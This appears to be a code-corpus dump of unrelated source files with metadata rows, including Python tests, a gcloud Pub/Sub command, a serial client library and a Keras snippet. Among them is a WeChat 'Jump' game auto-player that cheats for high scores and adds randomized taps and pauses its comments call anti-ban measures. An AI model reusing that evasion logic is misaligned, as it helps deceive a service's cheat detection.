assert pt_diff < 1.0e-3
def predvar1b_test():
out_files = [os.path.join(verf_dir,f) for f in os.listdir(verf_dir) if f.endswith(".out") and "ident" not in f]
pv1b_results = {}
for out_file in out_files:
pred_name = os.path.split(out_file)[-1].split('.')[0]
f = open(out_file,'r')
for _ in range(3):
f.readline()
arr = np.loadtxt(f)
pv1b_results[pred_name] = arr
pst = pyemu.Pst(ord_base+".pst")
omitted_parameters = [pname for pname in pst.parameter_data.parnme if pname.startswith("wf")]
la_ord_errvar = pyemu.ErrVar(jco=ord_base+".jco",
predictions=predictions,
omitted_parameters=omitted_parameters,
verbose=False)
df = la_ord_errvar.get_errvar_dataframe(np.arange(36))
max_idx = 13
idx = np.arange(max_idx)
for ipred,pred in enumerate(predictions):
arr = pv1b_results[pred][:max_idx,:]
first = df[("first", pred)][:max_idx]
second = df[("second", pred)][:max_idx]
third = df[("third", pred)][:max_idx]
first_diff = (np.abs(arr[:,1] - first)).sum()
second_diff = (np.abs(arr[:,2] - second)).sum()
third_diff = (np.abs(arr[:,3] - third)).sum()
print(pred,first_diff,second_diff,third_diff)
assert first_diff < 1.5
assert second_diff < 1.5
assert third_diff < 1.5
def ident_test():
idf = pd.read_csv(os.path.join(verf_dir,"ident.out"),delim_whitespace=True,index_col="parameter")
la_ord_errvar = pyemu.ErrVar(jco=ord_base+".jco",
predictions=predictions,
verbose=False)
df = la_ord_errvar.get_identifiability_dataframe(5)
for pname in idf.index:
ival = idf.loc[pname,"identifiability"]
val = df.loc[pname,"ident"]
diff = np.abs(ival - val)
print(pname,ival,val)
assert diff < 1.0E-3,"{0}:{1}".format(pname,diff)
def pnulpar_test():
pst = pyemu.Pst(ord_base+".pst")
# load the pnulpar projected ensemble
d = os.path.join(verf_dir,"proj_par_draws")
par_files = [ os.path.join(d,f) for f in os.listdir(d) if f.startswith("draw_")]
pnul_en = pyemu.ParameterEnsemble.from_parfiles(pst=pst,parfile_names=par_files)
#pnul_en.read_parfiles_prefix(os.path.join(verf_dir,"proj_par_draws","draw_"))
pnul_en.loc[:,"fname"] = pnul_en.index
#pnul_en.index = pnul_en.fname.apply(lambda x:str(int(x.split('.')[0].split('_')[-1])))
f = pnul_en.pop("fname")
mc = pyemu.MonteCarlo(jco=ord_base+".jco")
d = os.path.join(verf_dir, "prior_par_draws")
par_files = [os.path.join(d, f) for f in os.listdir(d) if f.startswith("draw_")]
#mc.parensemble.read_parfiles_prefix(os.path.join(verf_dir,"prior_par_draws","draw_"))
mc.parensemble = pyemu.ParameterEnsemble.from_parfiles(pst=mc.pst,parfile_names=par_files)
mc.parensemble.loc[:,"fname"] = mc.parensemble.index
#mc.parensemble.index = mc.parensemble.fname.apply(lambda x:str(int(x.split('.')[0].split('_')[-1])))
f = mc.parensemble.pop("fname")
en = mc.project_parensemble(nsing=1,inplace=False)
diff = 100 * (np.abs(pnul_en - en) / en)
assert max(diff.max()) < 1.0e-3
if __name__ == "__main__":
#predunc7_test()
#predunc1_test()
#predvar1b_test()
#ident_test()
pnulpar_test()
| 37.653846
| 115
| 0.638407
|
4a111e481264ea2f2f7c1097aa1a982cdab129e2
| 473
|
py
|
Python
|
platform/core/polyaxon/administration/__init__.py
|
hackerwins/polyaxon
|
ff56a098283ca872abfbaae6ba8abba479ffa394
|
[
"Apache-2.0"
] | null | null | null |
platform/core/polyaxon/administration/__init__.py
|
hackerwins/polyaxon
|
ff56a098283ca872abfbaae6ba8abba479ffa394
|
[
"Apache-2.0"
] | null | null | null |
platform/core/polyaxon/administration/__init__.py
|
hackerwins/polyaxon
|
ff56a098283ca872abfbaae6ba8abba479ffa394
|
[
"Apache-2.0"
] | null | null | null |
from hestia.service_interface import LazyServiceWrapper
from django.conf import settings
from administration.service import AdminService
def get_admin_backend():
return settings.ADMIN_BACKEND or 'administration.service.AdminService'
def get_admin_options():
return {'models': settings.ADMIN_MODELS}
backend = LazyServiceWrapper(
backend_base=AdminService,
backend_path=get_admin_backend(),
options=get_admin_options()
)
backend.expose(locals())
| 21.5
| 74
| 0.79704
|
4a111e78dd7a53c9191820414c26b11c10b3b15b
| 1,710
|
py
|
Python
|
lib/surface/pubsub/subscriptions/get_iam_policy.py
|
kustodian/google-cloud-sdk
|
b6bae4137d4b58030adb3dcb1271216dfb19f96d
|
[
"Apache-2.0"
] | null | null | null |
lib/surface/pubsub/subscriptions/get_iam_policy.py
|
kustodian/google-cloud-sdk
|
b6bae4137d4b58030adb3dcb1271216dfb19f96d
|
[
"Apache-2.0"
] | 11
|
2020-02-29T02:51:12.000Z
|
2022-03-30T23:20:08.000Z
|
lib/surface/pubsub/subscriptions/get_iam_policy.py
|
kustodian/google-cloud-sdk
|
b6bae4137d4b58030adb3dcb1271216dfb19f96d
|
[
"Apache-2.0"
] | 1
|
2020-07-24T18:47:35.000Z
|
2020-07-24T18:47:35.000Z
|
# -*- coding: utf-8 -*- #
# Copyright 2017 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Cloud Pub/Sub subscriptions get-iam-policy command."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.api_lib.pubsub import subscriptions
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.pubsub import resource_args
@base.ReleaseTracks(base.ReleaseTrack.BETA)
class GetIamPolicy(base.ListCommand):
"""Get the IAM policy for a Cloud Pub/Sub Subscription."""
detailed_help = {
'DESCRIPTION':
'{description}',
'EXAMPLES':
"""\
To print the IAM policy for a given subscription, run:
$ {command} my-subscription
""",
}
@staticmethod
def Args(parser):
resource_args.AddSubscriptionResourceArg(parser,
'to get the IAM policy of.')
base.URI_FLAG.RemoveFromParser(parser)
def Run(self, args):
client = subscriptions.SubscriptionsClient()
subscription_ref = args.CONCEPTS.subscription.Parse()
return client.GetIamPolicy(subscription_ref)
| 32.264151
| 74
| 0.716374
|
4a111f675355638e34ec09448135de7399c550f6
| 4,872
|
py
|
Python
|
test/functional/interface_http.py
|
criptolot/bsvcoin
|
125fc951c1bb5a87b706c5a3821a1e3252f45a3d
|
[
"MIT"
] | null | null | null |
test/functional/interface_http.py
|
criptolot/bsvcoin
|
125fc951c1bb5a87b706c5a3821a1e3252f45a3d
|
[
"MIT"
] | null | null | null |
test/functional/interface_http.py
|
criptolot/bsvcoin
|
125fc951c1bb5a87b706c5a3821a1e3252f45a3d
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2014-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the RPC HTTP basics."""
from test_framework.test_framework import BsvcoinTestFramework
from test_framework.util import assert_equal, str_to_b64str
import http.client
import urllib.parse
class HTTPBasicsTest (BsvcoinTestFramework):
def set_test_params(self):
self.num_nodes = 3
self.supports_cli = False
def setup_network(self):
self.setup_nodes()
def run_test(self):
#################################################
# lowlevel check for http persistent connection #
#################################################
url = urllib.parse.urlparse(self.nodes[0].url)
authpair = url.username + ':' + url.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert b'"error":null' in out1
assert conn.sock is not None #according to http/1.1 connection must still be open!
#send 2nd request without closing connection
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert b'"error":null' in out1 #must also response with a correct json-rpc message
assert conn.sock is not None #according to http/1.1 connection must still be open!
conn.close()
#same should be if we add keep-alive because this should be the std. behaviour
headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection": "keep-alive"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert b'"error":null' in out1
assert conn.sock is not None #according to http/1.1 connection must still be open!
#send 2nd request without closing connection
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert b'"error":null' in out1 #must also response with a correct json-rpc message
assert conn.sock is not None #according to http/1.1 connection must still be open!
conn.close()
#now do the same with "Connection: close"
headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection":"close"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert b'"error":null' in out1
assert conn.sock is None #now the connection must be closed after the response
#node1 (2nd node) is running with disabled keep-alive option
urlNode1 = urllib.parse.urlparse(self.nodes[1].url)
authpair = urlNode1.username + ':' + urlNode1.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(urlNode1.hostname, urlNode1.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert b'"error":null' in out1
#node2 (third node) is running with standard keep-alive parameters which means keep-alive is on
urlNode2 = urllib.parse.urlparse(self.nodes[2].url)
authpair = urlNode2.username + ':' + urlNode2.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert b'"error":null' in out1
assert conn.sock is not None #connection must be closed because bsvcoind should use keep-alive by default
# Check excessive request size
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', '/' + ('x'*1000), '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.NOT_FOUND)
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', '/' + ('x'*10000), '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.BAD_REQUEST)
if __name__ == '__main__':
HTTPBasicsTest ().main ()
| 44.290909
| 114
| 0.636905
|
4a111f93e4c79037823a0aad5225fad57a7854fa
| 11,662
|
py
|
Python
|
wechat_jump_auto_curves.py
|
GangHg/wechat_jump_game
|
a6139aa6d0730c62107a54fd32a500aab2db8375
|
[
"Apache-2.0"
] | null | null | null |
wechat_jump_auto_curves.py
|
GangHg/wechat_jump_game
|
a6139aa6d0730c62107a54fd32a500aab2db8375
|
[
"Apache-2.0"
] | null | null | null |
wechat_jump_auto_curves.py
|
GangHg/wechat_jump_game
|
a6139aa6d0730c62107a54fd32a500aab2db8375
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
##基于python3.5(64位)
###如果缺少scikit-image库,建议进下面网址下载whl直接安装
##https://www.lfd.uci.edu/~gohlke/pythonlibs/#scikit-image
=== 思路 ===
核心:每次落稳之后截图,根据截图算出棋子的坐标和下一个块顶面的中点坐标,
根据两个点的距离乘以一个时间系数获得长按的时间
识别棋子:靠棋子的颜色来识别位置,通过截图发现最下面一行大概是一条
直线,就从上往下一行一行遍历,比较颜色(颜色用了一个区间来比较)
找到最下面的那一行的所有点,然后求个中点,求好之后再让 Y 轴坐标
减小棋子底盘的一半高度从而得到中心点的坐标
识别棋盘:靠底色和方块的色差来做,从分数之下的位置开始,一行一行扫描,
由于圆形的块最顶上是一条线,方形的上面大概是一个点,所以就
用类似识别棋子的做法多识别了几个点求中点,这时候得到了块中点的 X
轴坐标,这时候假设现在棋子在当前块的中心,根据一个通过截图获取的
固定的角度来推出中点的 Y 坐标
最后:根据两点的坐标算距离乘以系数来获取长按时间(似乎可以直接用 X 轴距离)
"""
from __future__ import print_function, division
import sys
import time
import math
import random
from PIL import Image
from six.moves import input
from skimage import io,transform
import numpy as np
import tensorflow as tf
try:
from common import debug, config, screenshot, UnicodeStreamFilter
from common.auto_adb import auto_adb
except Exception as ex:
print(ex)
print('请将脚本放在项目根目录中运行')
print('请检查项目根目录中的 common 文件夹是否存在')
exit(1)
adb = auto_adb()
VERSION = "1.1.3"
# DEBUG 开关,需要调试的时候请改为 True,不需要调试的时候为 False
DEBUG_SWITCH = False
# Magic Number,不设置可能无法正常执行,请根据具体截图从上到下按需
# 设置,设置保存在 config 文件夹中
config = config.open_accordant_config()
under_game_score_y = config['under_game_score_y']
# 长按的时间系数,请自己根据实际情况调节
press_coefficient = config['press_coefficient']
# 二分之一的棋子底座高度,可能要调节
piece_base_height_1_2 = config['piece_base_height_1_2']
# 棋子的宽度,比截图中量到的稍微大一点比较安全,可能要调节
piece_body_width = config['piece_body_width']
target_score=1024 ##目标分数
total_step=30 ##达到目标次数所需游戏次数
start_score=100 ##设置第一次分数(目前分数)
def set_button_position(im):
"""
将 swipe 设置为 `再来一局` 按钮的位置
"""
global swipe_x1, swipe_y1, swipe_x2, swipe_y2
w, h = im.size
left = int(w / 2)
top = int(1584 * (h / 1920.0))
left = int(random.uniform(left - 100, left + 100))
top = int(random.uniform(top - 100, top + 100)) # 随机防 ban
after_top = int(random.uniform(top - 100, top + 100))
after_left = int(random.uniform(left - 100, left + 100))
swipe_x1, swipe_y1, swipe_x2, swipe_y2 = left, top, after_left, after_top
def jump(distance):
"""
跳跃一定的距离
"""
press_time = distance * press_coefficient
press_time = max(press_time, 200) # 设置 200ms 是最小的按压时间
press_time = int(press_time)
cmd = 'shell input swipe {x1} {y1} {x2} {y2} {duration}'.format(
x1=swipe_x1,
y1=swipe_y1,
x2=swipe_x2,
y2=swipe_y2,
duration=press_time
)
print('{} {}'.format(adb.adb_path, cmd))
adb.run(cmd)
return press_time
def find_piece_and_board(im):
"""
寻找关键坐标
"""
w, h = im.size
piece_x_sum = 0
piece_x_c = 0
piece_y_max = 0
board_x = 0
board_y = 0
scan_x_border = int(w / 8) # 扫描棋子时的左右边界
scan_start_y = 0 # 扫描的起始 y 坐标
im_pixel = im.load()
# 以 50px 步长,尝试探测 scan_start_y
for i in range(int(h / 3), int(h*2 / 3), 50):
last_pixel = im_pixel[0, i]
for j in range(1, w):
pixel = im_pixel[j, i]
# 不是纯色的线,则记录 scan_start_y 的值,准备跳出循环
if pixel != last_pixel:
scan_start_y = i - 50
break
if scan_start_y:
break
print('scan_start_y: {}'.format(scan_start_y))
# 从 scan_start_y 开始往下扫描,棋子应位于屏幕上半部分,这里暂定不超过 2/3
for i in range(scan_start_y, int(h * 2 / 3)):
# 横坐标方面也减少了一部分扫描开销
for j in range(scan_x_border, w - scan_x_border):
pixel = im_pixel[j, i]
# 根据棋子的最低行的颜色判断,找最后一行那些点的平均值,这个颜
# 色这样应该 OK,暂时不提出来
if (50 < pixel[0] < 60) \
and (53 < pixel[1] < 63) \
and (95 < pixel[2] < 110):
piece_x_sum += j
piece_x_c += 1
piece_y_max = max(i, piece_y_max)
if not all((piece_x_sum, piece_x_c)):
return 0, 0, 0, 0
piece_x = int(piece_x_sum / piece_x_c)
piece_y = piece_y_max - piece_base_height_1_2 # 上移棋子底盘高度的一半
# 限制棋盘扫描的横坐标,避免音符 bug
if piece_x < w/2:
board_x_start = piece_x
board_x_end = w
else:
board_x_start = 0
board_x_end = piece_x
for i in range(int(h / 3), int(h * 2 / 3)):
last_pixel = im_pixel[0, i]
if board_x or board_y:
break
board_x_sum = 0
board_x_c = 0
for j in range(int(board_x_start), int(board_x_end)):
pixel = im_pixel[j, i]
# 修掉脑袋比下一个小格子还高的情况的 bug
if abs(j - piece_x) < piece_body_width:
continue
# 修掉圆顶的时候一条线导致的小 bug,这个颜色判断应该 OK,暂时不提出来
if abs(pixel[0] - last_pixel[0]) \
+ abs(pixel[1] - last_pixel[1]) \
+ abs(pixel[2] - last_pixel[2]) > 10:
board_x_sum += j
board_x_c += 1
if board_x_sum:
board_x = board_x_sum / board_x_c
last_pixel = im_pixel[board_x, i]
# 从上顶点往下 +274 的位置开始向上找颜色与上顶点一样的点,为下顶点
# 该方法对所有纯色平面和部分非纯色平面有效,对高尔夫草坪面、木纹桌面、
# 药瓶和非菱形的碟机(好像是)会判断错误
for k in range(i+274, i, -1): # 274 取开局时最大的方块的上下顶点距离
pixel = im_pixel[board_x, k]
if abs(pixel[0] - last_pixel[0]) \
+ abs(pixel[1] - last_pixel[1]) \
+ abs(pixel[2] - last_pixel[2]) < 10:
break
board_y = int((i+k) / 2)
# 如果上一跳命中中间,则下个目标中心会出现 r245 g245 b245 的点,利用这个
# 属性弥补上一段代码可能存在的判断错误
# 若上一跳由于某种原因没有跳到正中间,而下一跳恰好有无法正确识别花纹,则有
# 可能游戏失败,由于花纹面积通常比较大,失败概率较低
for j in range(i, i+200):
pixel = im_pixel[board_x, j]
if abs(pixel[0] - 245) + abs(pixel[1] - 245) + abs(pixel[2] - 245) == 0:
board_y = j + 10
break
if not all((board_x, board_y)):
return 0, 0, 0, 0
return piece_x, piece_y, board_x, board_y
def yes_or_no(prompt, true_value='y', false_value='n', default=True):
"""
检查是否已经为启动程序做好了准备
"""
default_value = true_value if default else false_value
prompt = '{} {}/{} [{}]: '.format(prompt, true_value,
false_value, default_value)
i = input(prompt)
if not i:
return default
while True:
if i == true_value:
return True
elif i == false_value:
return False
prompt = 'Please input {} or {}: '.format(true_value, false_value)
i = input(prompt)
def pross_data(image):
pixels = list(image.getdata()) # 得到像素数据 灰度0-255
#print(len(pixels))
for i in range(len(pixels)):
if pixels[i]<100:
pixels[i]=0
else:
pixels[i]=255
return pixels
def pixel_division(img,w,h):
pixels = list(img.getdata())
row_pix=np.zeros([1,h])
col_pix=np.zeros([1,w])
for i in range(w):
for j in range(h):
if pixels[j*w+i]<100:
row_pix[0,j]+=1
col_pix[0,i]+=1
start_h=0
end_h=0
flag=0
for j in range(h):
if row_pix[0,j]>=1 and flag==0:
start_h=j
flag=1
if row_pix[0,j]>=1:
end_h=j
pixels_Widh=[]
end_w=0
for i in range(1,w):
if col_pix[0,i-1]<=0 and col_pix[0,i]>=1:
pixels_Widh.append(i-1)
if col_pix[0,i]>=1:
end_w=i
pixels_Widh.append(end_w+1)
return start_h,end_h,pixels_Widh
def strint(score0):
if(score0<10):
return str(score0)
else:
return ""
def read_one_image(path):
img = io.imread(path)
w=81
h=81
c=1
img = transform.resize(img,(w,h,c))
return np.asarray(img)
def main():
"""
主函数
"""
op = yes_or_no('请确保手机打开了 ADB 并连接了电脑,'
'然后打开跳一跳并【开始游戏】后再用本程序,确定开始?')
if not op:
print('bye')
return
print('程序版本号:{}'.format(VERSION))
debug.dump_device_info()
screenshot.check_screenshot()
i, next_rest, next_rest_time = (0, random.randrange(3, 10),
random.randrange(5, 10))
j= 0
################ 分数曲线公式
y_score=[]
next_start=0
global start_score
for i in range(total_step):
each_score=target_score*(1-np.exp(-0.15*(1024.0/target_score)*i))
y_score.append(each_score)
if start_score>each_score:
next_start=i
next_start+=1
#print(y_score)
if start_score<y_score[0]:
next_start=0
###################
with tf.Session() as sess:
saver = tf.train.import_meta_graph('./resource/model/model.ckpt.meta')
saver.restore(sess,tf.train.latest_checkpoint('./resource/model/'))
graph = tf.get_default_graph()
x = graph.get_tensor_by_name("x:0")
logits = graph.get_tensor_by_name("logits_eval:0")
#####################识别分数
while True:
screenshot.pull_screenshot()
im = Image.open('./autojump.png')
##比例系数
pix_w=im.size[0]*1.0/1080
pix_h=im.size[1]
region=im.crop((0,pix_h*0.1,460*pix_w,pix_h*0.2))
region=region.convert('L')
start_h,end_h,pixels_Widh=pixel_division(region,int(460*pix_w),int(pix_h*0.1))
if start_h==end_h:
continue
data = []
for i in range(len(pixels_Widh)-1):
region1=region.crop((pixels_Widh[i],start_h,pixels_Widh[i+1],end_h))
region1.putdata(pross_data(region1))
str1="./region"+str(i)+".png"
region1.save(str1)
data1 = read_one_image(str1)
data.append(data1)
feed_dict = {x:data}
classification_result = sess.run(logits,feed_dict)
output = []
output = tf.argmax(classification_result,1).eval()
m_score=""
for i in range(len(output)):
m_score+=strint(output[i])
if m_score=="":
continue
m_score=int(m_score)
print('score:{}'.format(m_score))
####################################
# 获取棋子和 board 的位置
print(j)
piece_x, piece_y, board_x, board_y = find_piece_and_board(im)
ts = int(time.time())
print(ts, piece_x, piece_y, board_x, board_y)
set_button_position(im)
if m_score > y_score[next_start]: ##自动结束这一次
print("----------------")
jump(math.sqrt((board_x - piece_x) ** 2 + (board_y - piece_y) ** 2)*5)
next_start+=1
time.sleep(5*random.random())
if next_start >len(y_score):
break
jump(math.sqrt((board_x - piece_x) ** 2 + (board_y - piece_y) ** 2))
if DEBUG_SWITCH:
debug.save_debug_screenshot(ts, im, piece_x,
piece_y, board_x, board_y)
debug.backup_screenshot(ts)
im.close()
i += 1
j += 1
if i == next_rest:
print('已经连续打了 {} 下,休息 {}s'.format(i, next_rest_time))
for j in range(next_rest_time):
sys.stdout.write('\r程序将在 {}s 后继续'.format(next_rest_time - j))
sys.stdout.flush()
time.sleep(1)
print('\n继续')
i, next_rest, next_rest_time = (0, random.randrange(30, 100),
random.randrange(10, 60))
# 为了保证截图的时候应落稳了,多延迟一会儿,随机值防 ban
time.sleep(random.uniform(0.9, 1.2))
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
adb.run('kill-server')
print('bye')
exit(0)
| 29.979434
| 90
| 0.561139
|
4a111fa13cb1124ecf8b445622087858c42c315f
| 10,143
|
py
|
Python
|
ublock/core.py
|
gwappa/python-ublock
|
bdd015c8e118cc6d49e916e65ce6ff6784a17b52
|
[
"MIT"
] | 1
|
2019-04-22T13:07:43.000Z
|
2019-04-22T13:07:43.000Z
|
ublock/core.py
|
gwappa/python-ublock
|
bdd015c8e118cc6d49e916e65ce6ff6784a17b52
|
[
"MIT"
] | null | null | null |
ublock/core.py
|
gwappa/python-ublock
|
bdd015c8e118cc6d49e916e65ce6ff6784a17b52
|
[
"MIT"
] | null | null | null |
import time
import threading
from traceback import print_tb
import serial
class protocol:
"""used for discriminating between line messages
other than the `DELIMITER`, usages are completely
up to the implementor."""
DEBUG = '.'
INFO = '>'
CONFIG = '@'
RESULT = '+'
ERROR = '*'
OUTPUT = '<'
DELIMITER = ';'
HELP = '?'
class iothread(threading.Thread):
def __init__(self, port, delegate, waitfirst=0, initialcmd=None):
super().__init__()
self.port = port
self.quitreq = False
self.buf = b''
self.delegate = delegate
self.connected = False
self.waitfirst = waitfirst
self.initialcmd = initialcmd
self.port.timeout = 1
self.start()
def writeLine(self, msg):
self.port.write((msg + "\r\n").encode())
def interrupt(self):
self.quitreq = True
self.port.close()
def run(self):
time.sleep(self.waitfirst)
if self.initialcmd is not None:
self.writeLine(self.initialcmd)
try:
while not self.quitreq:
try:
ch = self.port.read()
except serial.SerialTimeoutException:
continue
if self.connected == False:
self.connected = True
self.delegate.connected()
self.buf += ch
if ch == b'\n':
self.delegate.handleLine(self.buf[:-2].decode().strip())
self.buf = b''
except serial.SerialException:
pass # just finish the thread
print(">port closed")
self.delegate.closed()
class baseclient:
def __init__(self, addr, baud=9600, waitfirst=0, initialcmd=None):
self.port = serial.Serial(port=addr, baudrate=baud)
self.io = iothread(self.port, self, initialcmd=initialcmd, waitfirst=waitfirst)
def __enter__(self):
return self
def __exit__(self, exc, *args):
if exc is not None:
print_tb()
self.close()
def connected(self):
pass
def closed(self):
pass
def close(self):
if self.io is not None:
self.io.interrupt()
self.io.join()
self.io = None
def request(self, cmd):
if self.io is not None and self.io.connected == True:
self.io.writeLine(cmd)
else:
print("***port not connected: {}".format(self.addr))
def handleLine(self,line):
pass
class eventhandler:
"""the interface class for receiving events from CUISerial protocol.
except for `connected` and `closed`, the meaning of each type of messages
is up to the user."""
def connected(self, client):
"""called when a serial port is opened (does not necessarily mean
that the port is ready for receiving commands).
`client` stands for the corresponding `client` object."""
pass
def closed(self):
"""called when the connected serial port is closed."""
pass
def received(self, line):
"""called with a raw line that arrived at the serial port."""
pass
def debug(self, line):
pass
def info(self, line):
pass
def config(self, line):
pass
def result(self, line):
pass
def error(self, line):
pass
def output(self, line):
pass
def message(self, line):
"""called with a line that does not fall into any of the other
categories"""
pass
def tokenize(line, ch=protocol.DELIMITER, has_header=True):
"""a utility function to split an input line into a chunk of tokens.
it yields a token a time until it reaches the end of line."""
if has_header == True:
line = line[1:]
elems = line.split(ch)
# stripping on the right hand side
while len(elems[-1].strip()) == 0:
elems = elems[:-1]
if len(elems) == 0:
yield line
else:
for elem in elems:
if len(elem) == 0:
yield elem
class client(baseclient):
"""a client for serial communication that conforms to the CUISerial protocol."""
def __init__(self, addr, handler=None, baud=9600, waitfirst=0, initialcmd=None):
super().__init__(addr, baud=baud, waitfirst=waitfirst, initialcmd=initialcmd)
if handler is None:
handler = eventhandler()
self.handler = handler
@classmethod
def Uno(cls, addr, handler=None, baud=9600, initialcmd=None):
"""default call signatures for Uno-type boards."""
return cls(addr, handler=handler, baud=baud, waitfirst=1.2, initialcmd=initialcmd)
@classmethod
def Leonardo(cls, addr, handler=None, baud=9600, initialcmd=protocol.HELP):
"""default call signatures for Leonardo-type boards."""
return cls(addr, handler=handler, baud=baud, waitfirst=0, initialcmd=initialcmd)
def connected(self):
self.handler.connected(self)
def closed(self):
self.handler.closed()
def handleLine(self, line):
"""calls its handler's method(s) in turn, based on its first character."""
if self.handler is None:
return
self.handler.received(line)
line = line.strip()
if line.startswith(protocol.DEBUG):
self.handler.debug(line)
elif line.startswith(protocol.INFO):
self.handler.info(line)
elif line.startswith(protocol.CONFIG):
self.handler.config(line)
elif line.startswith(protocol.RESULT):
self.handler.result(line)
elif line.startswith(protocol.ERROR):
self.handler.error(line)
elif line.startswith(protocol.OUTPUT):
self.handler.output(line)
else:
self.handler.message(line)
def close(self):
if self.io is not None:
super().close()
if self.handler is not None:
self.handler.closed()
class loophandler:
"""the interface for classes that receive messages from `loop`."""
def starting(self, command, number, counter):
"""invoked when single loop with index being `counter`,
out of total number `number`, is starting"""
pass
def evaluate(self, result):
"""should return a boolean value whether or not to increment
the counter, given the `result` message."""
return True
def request(self, command):
"""proxy for serial I/O to dispatch a request."""
raise RuntimeError("no IO linked to: {}".format(self))
def done(self, command, number, counter):
"""invoked when the whole loop is ending."""
pass
class loop:
"""class that handles loop structures.
`io` can be any `client`-type instance (that accepts `request()`).
`handler` is supposed to be a `loophandler` object.
both `io` and `handler` can be set later, but before calling the
`start()` (or `run()`) method.
note that its `run()` method by itself only specifies
the procedure itself, and it does not run in another thread.
by calling its `start()` method, instead, it returns a new loop
execution thread.
"""
def __init__(self, command, number, interval=0,
io=None, handler=None):
super().__init__()
self.command = command
self.io = io
self.number = number
self.interval = interval
self.handler = loophandler() if handler is None else handler
self.update = threading.Condition()
self.result = None
self.toabort = False
def start(self, init=threading.Thread):
"""starts a new thread that has this instance's `run()`
as the target.
the callable responsible for the thread generation
can be specified via the `init` keyword argument
(note that the callable must take the `target` option
to be compatible with the threading.Thread initializer).
returns the started thread.
"""
thread = init(target=self.run)
thread.start()
return thread
def run(self):
counter = 0
self.toabort = False
while counter < self.number:
self.handler.starting(self.command,self.number,counter)
self.update.acquire()
try:
if self.io is not None:
self.io.request(self.command)
self.update.wait()
if self.handler.evaluate(self.result) == True:
counter += 1
if self.toabort == True:
break
else:
print("***no IO linked to: {}".format(self))
break
finally:
self.update.release()
if (self.number > 1) and (self.interval > 0):
time.sleep(self.interval)
self.handler.done(self.command,self.number,counter)
def abort(self):
self.update.acquire()
self.toabort = True
self.update.release()
def updateWithMessage(self, msg):
self.update.acquire()
self.result = msg
self.update.notify_all()
self.update.release()
def testResult(status_set, returns='result'):
"""generates an evaluator that tests if the returned status
starts with one of the word in `status_set`.
intended for the use with `loophandler.evaluate()`.
"""
if returns.lower() == 'result':
header = protocol.RESULT
elif returns.lower() == 'config':
header = protocol.CONFIG
else:
raise ValueError("'returns' currently only accepts 'result' or 'config'")
def __evaluator(msg):
if protocol.DELIMITER in msg:
msg = msg[:(msg.index(protocol.DELIMITER))]
if msg[0] == header:
msg = msg[1:]
return (msg in status_set)
return __evaluator
| 30.92378
| 95
| 0.578527
|
4a1120946ddcfdc38e3d759bb1d6a87a8565f053
| 1,785
|
py
|
Python
|
talks/burlingtonMeetup2019/python/one_neuron.py
|
breckbaldwin/StanIsThePlan
|
919fd9843d5e73234d582f8a33b0477a1f010887
|
[
"BSD-3-Clause"
] | 2
|
2019-08-19T19:09:43.000Z
|
2019-08-21T13:08:23.000Z
|
talks/burlingtonMeetup2019/python/one_neuron.py
|
breckbaldwin/StanIsThePlan
|
919fd9843d5e73234d582f8a33b0477a1f010887
|
[
"BSD-3-Clause"
] | null | null | null |
talks/burlingtonMeetup2019/python/one_neuron.py
|
breckbaldwin/StanIsThePlan
|
919fd9843d5e73234d582f8a33b0477a1f010887
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
plt.style.use('default')
import keras
from keras.models import Sequential
from keras.layers import Dense
from keras.utils import to_categorical
from keras import optimizers
X=np.array([2,2])
Y=np.array([1,1])
model = Sequential()
model.add(Dense(1, batch_input_shape=(None, 1),
activation='sigmoid'))
#activation='linear'))
#model.add(Dense(19, batch_input_shape=(None, 18),activation='sigmoid'))
#model.add(Dense(2, activation='softmax'))
# Definition of the optimizer
sgd = optimizers.SGD(lr=0.15)
# compile model # compile model, which ends the definition of the model
model.compile(loss='binary_crossentropy',
#model.compile(loss='categorical_crossentropy',
optimizer=sgd, # using the stochastic gradient descent optimizer
metrics=['accuracy'])
model.summary()
print(X.shape)
# Training of the network
history = model.fit(X, Y, # training of the model using the training data stored in X and Y for 4100 epochs
epochs=400, # for 400 epochs
batch_size=128, # fix the batch size to 128 examples
